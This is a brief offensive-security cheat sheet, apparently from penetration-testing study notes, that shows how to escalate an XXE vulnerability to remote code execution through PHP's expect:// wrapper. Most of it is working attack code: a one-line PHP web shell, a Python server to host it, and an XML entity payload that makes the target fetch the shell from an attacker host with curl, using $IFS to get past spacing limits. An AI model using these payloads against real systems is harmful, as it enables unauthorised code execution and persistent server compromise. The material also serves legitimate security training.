PRIMARY CATEGORY → XXE
PHP Extension - Expect
As with LFI, an operator could gain RCE through an XXE vulnerability, namely by using a PHP Expect Extension
This PHP wrapper allows system command execution, as we can see here
So, we could upload a web shell for greater flexibility since we are quite limited in terms of command execution syntax within the XML declaration
Creating a Web Shell
echo -n '<?php system($_GET[0]); ?>' > shell.phpSetting up an HTTP Server
python -m http.server 80Uploading the Shell to the target through the XXE
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY bar SYSTEM "expect://curl$IFS-O$IFS10.10.10.5/shell.php"
]>
...<SNIP>...
<email>
&bar;
</email>